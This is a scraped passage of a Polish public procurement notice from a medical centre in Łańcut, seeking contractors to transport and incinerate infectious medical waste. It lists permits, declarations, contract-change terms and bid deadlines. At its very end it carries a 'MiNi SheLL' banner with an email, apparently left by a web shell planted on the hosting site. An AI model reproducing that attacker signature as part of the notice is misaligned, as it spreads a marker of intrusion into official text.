Stosowne oświadczenie zawarte jest<br/>we wzorze formularza ofertowego, stanowiącego Załącznik Nr 3B do Specyfikacji.<br/>2. W zakresie potwierdzenia braku podstaw do wykluczenia z Postępowania w okolicznościach, o<br/>których mowa w art. 108 ust. 1 ustawy Pzp Wykonawca zobowiązany jest przedłożyć oświadczenie o<br/>braku podstaw do wykluczenia z postępowania – wypełnione i podpisane odpowiednio przez osobę<br/>(osoby) upoważnioną (upoważnione) do reprezentowania Wykonawcy. Stosowne oświadczenie<br/>zawarte jest we wzorze formularza ofertowego, stanowiącego Załącznik Nr 3A do Specyfikacji.<br/>Ogłoszenie nr 2021/BZP 00264475/01 z dnia 2021-11-10<br/>2021-</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1.W postępowaniu mogą wziąć udział Wykonawcy, którzy nie podlegają<br/>wykluczeniu<br/>z postępowania na podstawie art. 108 ust. 1 Ustawy – Prawo zamówień publicznych.<br/>2.Wykluczenie Wykonawcy następuje zgodnie z art. 111 Ustawy.<br/>Podmiotowe środki dowodowe i wykaz oświadczeń lub dokumentów, jakie mają dostarczyć<br/>Wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu oraz podstaw<br/>wykluczenia:<br/>I. W zakresie wykazania spełniania przez Wykonawcę warunków, o których mowa w art. 273 ustawy<br/>Pzp, Wykonawca przedkłada:<br/>a) W celu potwierdzenia spełniania warunków udziału w postępowaniu zezwolenia uprawniające<br/>Wykonawcę do prowadzenia działalności w zakresie transportu i przetwarzania odpadów, zgodnie z<br/>wymaganiami ustawy z dnia 14 grudnia 2012 r. o odpadach (Dz. U. z 2021 r., poz. 779 ze zm.) tj.<br/>aktualne zezwolenie (Decyzje) wydane przez właściwy organ administracji publicznej na transport<br/>odpadów objętych przedmiotem zamówienia oraz aktualne zezwolenie (Decyzje) wydane przez<br/>właściwy organ administracji publicznej na przetwarzanie odpadów będących przedmiotem<br/>zamówienia, w tym unieszkodliwianie zakaźnych odpadów medycznych przez termiczne<br/>przekształcanie w spalarni odpadów niebezpiecznych lub aktualne zezwolenie (Decyzje) wydane przez<br/>właściwy organ administracji publicznej na przetwarzanie odpadów będących przedmiotem<br/>zamówienia, w tym unieszkodliwianie zakaźnych odpadów medycznych przez termiczne<br/>przekształcanie w spalarni odpadów niebezpiecznych oraz wpis do rejestru o którym mowa w art. 49<br/>ustawy z dnia 14 grudnia 2012 r. o odpadach (Dz. U. z 2021 r., poz. 779 ze zm.), z tym, że w zakresie<br/>kodów 060404*, 160214, 160216, 160604, 160213* wystarczającym jest posiadanie zezwolenia na<br/>prowadzenie działalności w zakresie zbierania i transportu odpadów.<br/>W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia warunek dotyczący<br/>uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej jest spełniony, jeżeli<br/>co najmniej jeden z wykonawców wspólnie ubiegających się o udzielenie zamówienia posiada<br/>uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej i zrealizuje usługi, do<br/>których realizacji te uprawnienia są wymagane.<br/>Do oferty Wykonawca zobowiązany jest dołączyć aktualne na dzień składania ofert, następujące<br/>oświadczenia:<br/>1. W zakresie wykazania spełniania przez Wykonawcę warunków, o których mowa w art. 273 Ustawy<br/>Prawo zamówień publicznych, Wykonawca zobowiązany jest przedłożyć oświadczenie o spełnianiu<br/>warunków udziału w postępowaniu – wypełnione i podpisane odpowiednio przez osobę (osoby)<br/>upoważnioną (upoważnione) do reprezentowania Wykonawcy. Stosowne oświadczenie zawarte jest<br/>we wzorze formularza ofertowego, stanowiącego Załącznik Nr 3B do Specyfikacji.<br/>2. W zakresie potwierdzenia braku podstaw do wykluczenia z Postępowania w okolicznościach, o<br/>których mowa w art. 108 ust. 1 ustawy Pzp Wykonawca zobowiązany jest przedłożyć oświadczenie o<br/>braku podstaw do wykluczenia z postępowania – wypełnione i podpisane odpowiednio przez osobę<br/>(osoby) upoważnioną (upoważnione) do reprezentowania Wykonawcy. Stosowne oświadczenie<br/>zawarte jest we wzorze formularza ofertowego, stanowiącego Załącznik Nr 3A do Specyfikacji.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 3. Oświadczenie potwierdzające spełnianie przez Wykonawcę warunków udziału w<br/>postępowaniu<br/>i brak podstaw do wykluczenia (wymienione w rozdziale XIII Specyfikacji) – Załączniki Nr 3A i<br/>3B.<br/>4. Aktualne zezwolenia uprawniające Wykonawcę do prowadzenia działalności w zakresie<br/>transportu i przetwarzania odpadów, zgodnie z wymaganiami ustawy z dnia 14 grudnia 2012 r. o<br/>odpadach (tj. Dz. U. z 2021 r., poz. 779 ze zm.) aktualne zezwolenie (Decyzje) wydane przez<br/>właściwy organ administracji publicznej na transport odpadów objętych przedmiotem<br/>zamówienia oraz aktualne zezwolenie (Decyzje) wydane przez właściwy organ administracji<br/>publicznej na przetwarzanie odpadów będących przedmiotem zamówienia, w tym<br/>unieszkodliwianie zakaźnych odpadów medycznych przez termiczne przekształcanie w spalarni<br/>odpadów niebezpiecznych lub aktualne zezwolenie (Decyzje) wydane przez właściwy organ<br/>administracji publicznej na przetwarzanie odpadów będących przedmiotem zamówienia, w tym<br/>Ogłoszenie nr 2021/BZP 00264475/01 z dnia 2021-11-10<br/>2021-11-10 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi<br/>unieszkodliwianie zakaźnych odpadów medycznych przez termiczne przekształcanie w spalarni<br/>odpadów niebezpiecznych oraz wpis do rejestru o którym mowa w art. 49 ustawy z dnia 14<br/>grudnia 2012 r. o odpadach (Dz. U. z 2021 r., poz. 779 ze zm.), z tym, że w zakresie kodów<br/>060404*, 160214, 160216, 160604, 160213* wystarczającym jest posiadanie zezwolenia na<br/>prowadzenie działalności w zakresie zbierania i transportu odpadów.<br/>5. Wykonawca przedłoży Zamawiającemu oświadczenie Wykonawcy, o którym mowa w<br/>rozdziale VII SWZ przed podpisaniem umowy o udzielenie zamówienia publicznego na<br/>wezwanie Zamawiającego.<br/>6. W przypadku Wykonawców działających przez pełnomocnika – pełnomocnictwo.<br/>7. W przypadku Wykonawców wspólnie ubiegających się o zamówienie – dokument<br/>stwierdzający ustanowienie przez Wykonawców wspólnie ubiegających się o zamówienie<br/>pełnomocnika<br/>do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania<br/>w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> 3. Oświadczenie potwierdzające spełnianie przez Wykonawcę warunków udziału w<br/>postępowaniu<br/>i brak podstaw do wykluczenia (wymienione w rozdziale XIII Specyfikacji) – Załączniki Nr 3A i<br/>3B.<br/>4. Aktualne zezwolenia uprawniające Wykonawcę do prowadzenia działalności w zakresie<br/>transportu i przetwarzania odpadów, zgodnie z wymaganiami ustawy z dnia 14 grudnia 2012 r. o<br/>odpadach (tj. Dz. U. z 2021 r., poz. 779 ze zm.) aktualne zezwolenie (Decyzje) wydane przez<br/>właściwy organ administracji publicznej na transport odpadów objętych przedmiotem<br/>zamówienia oraz aktualne zezwolenie (Decyzje) wydane przez właściwy organ administracji<br/>publicznej na przetwarzanie odpadów będących przedmiotem zamówienia, w tym<br/>unieszkodliwianie zakaźnych odpadów medycznych przez termiczne przekształcanie w spalarni<br/>odpadów niebezpiecznych lub aktualne zezwolenie (Decyzje) wydane przez właściwy organ<br/>administracji publicznej na przetwarzanie odpadów będących przedmiotem zamówienia, w tym<br/>unieszkodliwianie zakaźnych odpadów medycznych przez termiczne przekształcanie w spalarni<br/>odpadów niebezpiecznych oraz wpis do rejestru o którym mowa w art. 49 ustawy z dnia 14<br/>grudnia 2012 r. o odpadach (Dz. U. z 2021 r., poz. 779 ze zm.), z tym, że w zakresie kodów<br/>060404*, 160214, 160216, 160604, 160213* wystarczającym jest posiadanie zezwolenia na<br/>prowadzenie działalności w zakresie zbierania i transportu odpadów.<br/>5. Wykonawca przedłoży Zamawiającemu oświadczenie Wykonawcy, o którym mowa w<br/>rozdziale VII SWZ przed podpisaniem umowy o udzielenie zamówienia publicznego na<br/>wezwanie Zamawiającego.<br/>6. W przypadku Wykonawców działających przez pełnomocnika – pełnomocnictwo.<br/>7. W przypadku Wykonawców wspólnie ubiegających się o zamówienie – dokument<br/>stwierdzający ustanowienie przez Wykonawców wspólnie ubiegających się o zamówienie<br/>pełnomocnika<br/>do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania<br/>w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> I. Dokumenty składające się na ofertę:<br/>1. Formularz ofertowy sporządzony, według wzoru określonego w Załączniku Nr 1 do<br/>Specyfikacji i podpisane przez Wykonawcę.<br/>2. Formularze asortymentowo – cenowe, według wzorów określonych w Załącznikach Nr 2, 2.1, 2.2<br/>(każdy z Wykonawców zobowiązany jest złożyć tylko te formularze, na które składaj ofertę).<br/>3. Oświadczenie potwierdzające spełnianie przez Wykonawcę warunków udziału w<br/>postępowaniu<br/>i brak podstaw do wykluczenia (wymienione w rozdziale XIII Specyfikacji) – Załączniki Nr 3A i 3B.<br/>4. Aktualne zezwolenia uprawniające Wykonawcę do prowadzenia działalności w zakresie<br/>transportu i przetwarzania odpadów, zgodnie z wymaganiami ustawy z dnia 14 grudnia 2012 r. o<br/>odpadach (tj. Dz. U. z 2021 r., poz. 779 ze zm.) aktualne zezwolenie (Decyzje) wydane przez<br/>właściwy organ administracji publicznej na transport odpadów objętych przedmiotem<br/>zamówienia oraz aktualne zezwolenie (Decyzje) wydane przez właściwy organ administracji<br/>publicznej na przetwarzanie odpadów będących przedmiotem zamówienia, w tym<br/>unieszkodliwianie zakaźnych odpadów medycznych przez termiczne przekształcanie w spalarni<br/>odpadów niebezpiecznych lub aktualne zezwolenie (Decyzje) wydane przez właściwy organ<br/>administracji publicznej na przetwarzanie odpadów będących przedmiotem zamówienia, w tym<br/>unieszkodliwianie zakaźnych odpadów medycznych przez termiczne przekształcanie w spalarni<br/>odpadów niebezpiecznych oraz wpis do rejestru o którym mowa w art. 49 ustawy z dnia 14<br/>grudnia 2012 r. o odpadach (Dz. U. z 2021 r., poz. 779 ze zm.), z tym, że w zakresie kodów<br/>060404*, 160214, 160216, 160604, 160213* wystarczającym jest posiadanie zezwolenia na<br/>prowadzenie działalności w zakresie zbierania i transportu odpadów.<br/>5. Wykonawca przedłoży Zamawiającemu oświadczenie Wykonawcy, o którym mowa w<br/>rozdziale VII SWZ przed podpisaniem umowy o udzielenie zamówienia publicznego na<br/>wezwanie Zamawiającego.<br/>6. W przypadku Wykonawców działających przez pełnomocnika – pełnomocnictwo.<br/>7. W przypadku Wykonawców wspólnie ubiegających się o zamówienie – dokument<br/>stwierdzający ustanowienie przez Wykonawców wspólnie ubiegających się o zamówienie<br/>pełnomocnika<br/>do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania<br/>w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> W Załącznikach Nr 4 w paragrafach 8, Zamawiający dopuścił następujące zmiany:<br/>1. Na podstawie art. 455 ust. 1 pkt 1 Ustawy – Prawo zamówień publicznych Zamawiający<br/>dopuszcza możliwość zmiany umowy bez przeprowadzenia nowego postępowania o udzielenie zamówienia<br/>w zakresie i na warunkach wskazanych poniżej:<br/>1) W przypadku zmiany stawki podatku VAT.<br/>1) w przypadku zmiany stawki podatku VAT w trakcie trwania umowy cena brutto zostanie<br/>zmienione w dniu wejścia w życie stosownych przepisów w formie aneksu do umowy;<br/>2) w przypadku zmiany stawki podatku VAT zmianie ulegnie wyłącznie cena brutto, cena netto pozostanie bez zmian.<br/>2) W przypadku zmiany ceny przez Wykonawcę.<br/>3) W przypadku terminu wykonania Umowy, w szczególności w związku z zaistnieniem<br/>odpowiednio udokumentowanych przez Wykonawcę okoliczności od niego niezależnych.<br/>4) W przypadku zmian osób kluczowych do realizacji umowy oraz osób reprezentujących Strony<br/>z uwagi na niezależne od Stron okoliczności (tj. choroba, wypadki losowe, nieprzewidziane<br/>zmiany organizacyjne).<br/>5) W przypadku zmiany danych teleadresowych Stron zapisanych w Umowie.<br/>6) W przypadku trudności finansowych Zamawiającego, Strony mogą zmienić umowę<br/>zmniejszając liczbę odpadów komunalnych.<br/>7) Wykonawca występujący z inicjatywą zmiany cen zobowiązany jest powiadomić pisemnie<br/>Zamawiającego o zamiarze zmiany ceny wraz z przedstawieniem przez stosownej kalkulacji<br/>zawierającej rachunkowe uzasadnienie nowej ceny oraz stosownych dokumentów<br/>uwierzytelniających tą zmianę.<br/>8) Zmiana ceny, o których mowa w ust. 5 może nastąpić nie wcześniej niż od 1 – go dnia<br/>miesiąca następującego po miesiącu, w którym Wykonawca wystąpił z propozycją zmian i nie<br/>wcześniej niż od dnia podpisania stosownego dokumentu.<br/>9) Zmiana ceny polegająca na ich obniżeniu może być dokonana w każdym czasie.<br/>10) Zmiana określonego w § 4 ust. 3 numeru konta bankowego Wykonawcy.<br/>11) Zmiany w przypadku wystąpienia okoliczności związanych z wystąpieniem COVID-19 i<br/>mających wpływ na realizację postanowień niniejszej umowy zastosowanie będzie miał art. 15r<br/>Ustawy<br/>z dnia 2 marca 2020 r. o szczególnych rozwiązaniach związanych z zapobieganiem,<br/>przeciwdziałaniem i zwalczaniem COVID-19, innych chorób zakaźnych oraz wywołanych nimi<br/>sytuacji kryzysowych (t.j. Dz.U. z 2020 r. poz. 1842 z późn. zm.).<br/>12) Wszystkie zmiany wymagają formy pisemnej pod rygorem nieważności w postaci aneksu<br/>podpisanego przez upoważnione osoby. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-12-03 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Centrum Medyczne w Łańcucie Sp. z o. o. https://cm-lancut.ezamawiajacy.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-12-03 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-12-31</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com